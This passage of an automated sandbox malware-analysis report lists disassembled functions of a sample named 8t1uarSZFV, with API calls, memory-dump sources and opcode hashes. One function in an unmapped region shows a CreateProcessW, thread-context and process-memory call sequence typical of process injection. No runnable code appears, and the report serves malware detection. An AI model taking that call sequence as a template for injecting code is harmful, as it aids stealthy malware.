            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: __fread_nolock
            • String ID: EA06
            • API String ID: 2638373210-3962188686
            • Opcode ID: 94dd21ac006d0c79ebfedf8119cd8eaa7a7586c10e61ee59ddaaaac1431e3b8e
            • Instruction ID: b291db12a068dce9b3f3b7ed28ca6e01406f04626ae08ec9ce191706a7fc09b4
            • Opcode Fuzzy Hash: 94dd21ac006d0c79ebfedf8119cd8eaa7a7586c10e61ee59ddaaaac1431e3b8e
            • Instruction Fuzzy Hash: 8301B172944258BEDF28C7A9CC56FAEBBF89B05201F00459EE193D6181E5B8E6088B60
            Function 00FA3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
            Download Yara Rule
            APIs
            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA3908
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: IconNotifyShell_
            • String ID:
            • API String ID: 1144537725-0
            • Opcode ID: 2e1f564a76c0a1c8215150b6bfd25830bb8538c4e55204a255c04f119e30d740
            • Instruction ID: b389036305367a2581c6d503926b818ae7694e174767f6a90706a88a4161f572
            • Opcode Fuzzy Hash: 2e1f564a76c0a1c8215150b6bfd25830bb8538c4e55204a255c04f119e30d740
            • Instruction Fuzzy Hash: 9F3193B1904301DFE720DF24D485797BBE8FB49718F00092EF5DA93280E77AAA44DB52
            Function 00FA5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00FA949C,?,00008000), ref: 00FA5773
            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00FA949C,?,00008000), ref: 00FE4052
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 01e9d8244315298c1c355f14e83fbe77e3e9e2bfaac602a1c64d20ac647abb47
            • Instruction ID: 1f74327e0b95050233fd4185be0469a7ee7b1fa26d24e25da5ca5fb471b897af
            • Opcode Fuzzy Hash: 01e9d8244315298c1c355f14e83fbe77e3e9e2bfaac602a1c64d20ac647abb47
            • Instruction Fuzzy Hash: 52019231545225B6E3314A2ACC0EF977F98EF03BB0F108311BE9D6A1E0C7B45854EB90
            Function 00FAB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
            Download Yara Rule
            APIs
            • __Init_thread_footer.LIBCMT ref: 00FABB4E
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Init_thread_footer
            • String ID:
            • API String ID: 1385522511-0
            • Opcode ID: 2d0a139ac639c238765853bd0edb8454ea348147a8b8a016b42a1e9938a10659
            • Instruction ID: 5707aff3c805f1956a2f239a93cbe6bb8203da7e04a10d3f159dda0d2cbd8640
            • Opcode Fuzzy Hash: 2d0a139ac639c238765853bd0edb8454ea348147a8b8a016b42a1e9938a10659
            • Instruction Fuzzy Hash: FD32D1B1E00209DFDB20CF54C894BBEB7B5EF45320F148059EA45AB262DB79ED41EB61
            Function 00F0129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
            Download Yara Rule
            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 00F01A5B
            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F01AF1
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F01B13
            Memory Dump Source
            • Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f00000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$ContextCreateMemoryReadThreadWow64
            • String ID:
            • API String ID: 2438371351-0
            • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
            • Instruction ID: 99667332aa9fcf74608288edb907f5b30001ca5b8f128e4efaf3e7393c71b316
            • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
            • Instruction Fuzzy Hash: 2E12CD24E14658C6EB24DF64D8507DEB232FF68300F1090E9D10DEB7A5E77A4E81DB5A
            Function 00FA4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FA4EDD,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E9C
              • Part of subcall function 00FA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FA4EAE
              • Part of subcall function 00FA4E90: FreeLibrary.KERNEL32(00000000,?,?,00FA4EDD,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4EC0
            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4EFD
              • Part of subcall function 00FA4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FE3CDE,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E62
              • Part of subcall function 00FA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FA4E74
              • Part of subcall function 00FA4E59: FreeLibrary.KERNEL32(00000000,?,?,00FE3CDE,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E87
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Library$Load$AddressFreeProc
            • String ID:
            • API String ID: 2632591731-0
            • Opcode ID: c9b2f478df9d9151e6a7caf0a387c5e0abc71c300fbad174669ecbbcffd871ef
            • Instruction ID: 5216ed7cc5fd8adb01e8dc99da7b754452aa3d9e1458c8eeb1801530c5d45cb6
            • Opcode Fuzzy Hash: c9b2f478df9d9151e6a7caf0a387c5e0abc71c300fbad174669ecbbcffd871ef
            • Instruction Fuzzy Hash: AA112772600205AEDB14AB64DD06FAD77A49F81B10F20842DF492FB1C1DEB8FE04B750
            Function 00FD8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: __wsopen_s
            • String ID:
            • API String ID: 3347428461-0
            • Opcode ID: e49e0d29d8f020364365398fbda55ba7f546b215d040a5e6a84db52545ef1b00
            • Instruction ID: 5974ee2b96c6332e24886dbfe4792e691002858bdfe555071adff1fa1a5bbb6e
            • Opcode Fuzzy Hash: e49e0d29d8f020364365398fbda55ba7f546b215d040a5e6a84db52545ef1b00
            • Instruction Fuzzy Hash: C811487190410AAFCB05DF58E940ADE7BF5EF49310F14405AF808AB302DB31EA12DBA5
            Function 00FA9A40 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
            Download Yara Rule
            APIs
            • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00FA543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00FA9A9C
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 70ca12dd027b1386bfb16f54c984689d3eed8ac261d77a6fc309d3f771d86e4f
            • Instruction ID: 2aa596b5dbbde65fa298ec8845a2a3ae4de9a4572510260035c680ecaa6cf0db
            • Opcode Fuzzy Hash: 70ca12dd027b1386bfb16f54c984689d3eed8ac261d77a6fc309d3f771d86e4f
            • Instruction Fuzzy Hash: 12118C722087009FD720CE05C880B62B7F8EF45760F10C42EE9AB86650C7B4B845EB60
            Function 00FD5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
            Download Yara Rule
            APIs
              • Part of subcall function 00FD4C7D: RtlAllocateHeap.NTDLL(00000008,00FA1129,00000000,?,00FD2E29,00000001,00000364,?,?,?,00FCF2DE,00FD3863,01071444,?,00FBFDF5,?), ref: 00FD4CBE
            • _free.LIBCMT ref: 00FD506C
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AllocateHeap_free
            • String ID:
            • API String ID: 614378929-0
            • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
            • Instruction ID: 69519530467481695a43f793c742f94b4594df087713208d0ab19cb803d1e238
            • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
            • Instruction Fuzzy Hash: CB0126726047056BE3218E699C85A5AFBEEFB89370F29051EE18483380EA30A805D6B4
            Function 00FCE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
            • Instruction ID: aab941764affc67ff22c1c5d08212a54c00d22948a13837fa2bb7c27a94bc38a
            • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
            • Instruction Fuzzy Hash: 85F0F932931A1597C7313A798E07F5E339D9F62370F14072EF421922D1DB79E802B9A5
            Function 00FD4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • RtlAllocateHeap.NTDLL(00000008,00FA1129,00000000,?,00FD2E29,00000001,00000364,?,?,?,00FCF2DE,00FD3863,01071444,?,00FBFDF5,?), ref: 00FD4CBE
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: ec0351a53557338327dd9deee1a843cde4d26f4fff8cc81bdea1981f6f256f22
            • Instruction ID: 85530abf6edb2c6368bbd425f4e88eba33c68870c2b553a199a9a8df8bda304b
            • Opcode Fuzzy Hash: ec0351a53557338327dd9deee1a843cde4d26f4fff8cc81bdea1981f6f256f22
            • Instruction Fuzzy Hash: 8AF02432A2222067DB205E229D06F5A378AAF413B0B0C4117B805EB380CA34F800B2A0
            Function 00FD3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6,?,00FA1129), ref: 00FD3852
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 8f1ce98e304609e2ce6100915c0a01fe6f0355729016fd1cb1796b9a918e3878
            • Instruction ID: 03551f2e700bc9e1694d735d1c5dac39c360cd35480e9f33206c62f98b2c3712
            • Opcode Fuzzy Hash: 8f1ce98e304609e2ce6100915c0a01fe6f0355729016fd1cb1796b9a918e3878
            • Instruction Fuzzy Hash: ADE0E53390022556E63226669D01F9A364BAB427B0F0E0027BE44A6680CB65ED01B2E2
            Function 00FA4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
            Download Yara Rule
            APIs
            • FreeLibrary.KERNEL32(?,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4F6D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FreeLibrary
            • String ID:
            • API String ID: 3664257935-0
            • Opcode ID: f828a541f1cfc6897074bd07b17ba52e83787f9032525d35fa6404df480f3154
            • Instruction ID: f76b554f2f1dc7d43f44bd3d57ef919a9fd140c4e420107360a106931dcb7ba9
            • Opcode Fuzzy Hash: f828a541f1cfc6897074bd07b17ba52e83787f9032525d35fa6404df480f3154
            • Instruction Fuzzy Hash: 31F0A0B1405342CFDB348F20D490912B7E8AF42329320997EE1EA83610C7B1A844FF00
            Function 00FA2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
            Download Yara Rule
            APIs
            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA2DC4
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LongNamePath_wcslen
            • String ID:
            • API String ID: 541455249-0
            • Opcode ID: b8a40ed2097f7e74b36977e765a3e80dc61a7cb0853d79b7a0fadf466802c618
            • Instruction ID: 82d326e6991f0e296eb27d1a4d720b4f71dc586397d0b7cbb2b469a77a011800
            • Opcode Fuzzy Hash: b8a40ed2097f7e74b36977e765a3e80dc61a7cb0853d79b7a0fadf466802c618
            • Instruction Fuzzy Hash: 74E0CD726001245BC72192599C05FDA77DDDFC87D0F040071FD09E7248D974AD808690
            Function 01012693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: __fread_nolock
            • String ID:
            • API String ID: 2638373210-0
            • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
            • Instruction ID: 9da6962685c5224d9d92397f04818194906d4556aad7f52d81ba9433d072a626
            • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
            • Instruction Fuzzy Hash: 5EE04FB0609B005FDF395A28A951BB677E89F49300F10086EF6DB93296E57268458A4D
            Function 00FA2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA3908
              • Part of subcall function 00FAD730: GetInputState.USER32 ref: 00FAD807
            • SetCurrentDirectoryW.KERNEL32(?), ref: 00FA2B6B
              • Part of subcall function 00FA30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00FA314E
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: IconNotifyShell_$CurrentDirectoryInputState
            • String ID:
            • API String ID: 3667716007-0
            • Opcode ID: dcbe5280be3048e576da9335f7e0d0d344172f033b287a7c38a3276957997f4b
            • Instruction ID: f9f234d96b4f5ea835fcc5e03b14c0c6c4bc8dfd6da8a806108a3c162b089b83
            • Opcode Fuzzy Hash: dcbe5280be3048e576da9335f7e0d0d344172f033b287a7c38a3276957997f4b
            • Instruction Fuzzy Hash: 48E02CB2B0820807CA08BA34AC124BDB3499BD33A1F40043EF18393193CE3D8A49A322
            Function 00FE039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • CreateFileW.KERNELBASE(00000000,00000000,?,00FE0704,?,?,00000000,?,00FE0704,00000000,0000000C), ref: 00FE03B7
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: f49e94fe38cb19ba3dfac515a734e36df34c422286c7a9c3a792a4f0a953bdce
            • Instruction ID: 65f974f28662d1fd3b1fa03a92d1134469e29ff049b9f072ff7a6149d4b6db95
            • Opcode Fuzzy Hash: f49e94fe38cb19ba3dfac515a734e36df34c422286c7a9c3a792a4f0a953bdce
            • Instruction Fuzzy Hash: D2D06C3204010DBBDF128E84DD06EDA3BAAFB48714F014000BE58A6020C736E821AB90
            Function 00FA1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
            Download Yara Rule
            APIs
            • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00FA1CBC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: InfoParametersSystem
            • String ID:
            • API String ID: 3098949447-0
            • Opcode ID: 0762d59fdf17e215308cf9a784c644a4ae629d01f48231efb56f3186934b9d0d
            • Instruction ID: 81099d34424da31fde8afeb844dd8925fb0620945793940f36f6b5ebdd999622
            • Opcode Fuzzy Hash: 0762d59fdf17e215308cf9a784c644a4ae629d01f48231efb56f3186934b9d0d
            • Instruction Fuzzy Hash: D0C09B36680304DFF2344690BD4AF107755A348B00F048001F6CDB55C7C3B71460D750
            Function 0101744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00FA949C,?,00008000), ref: 00FA5773
            • GetLastError.KERNEL32(00000002,00000000), ref: 010176DE
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
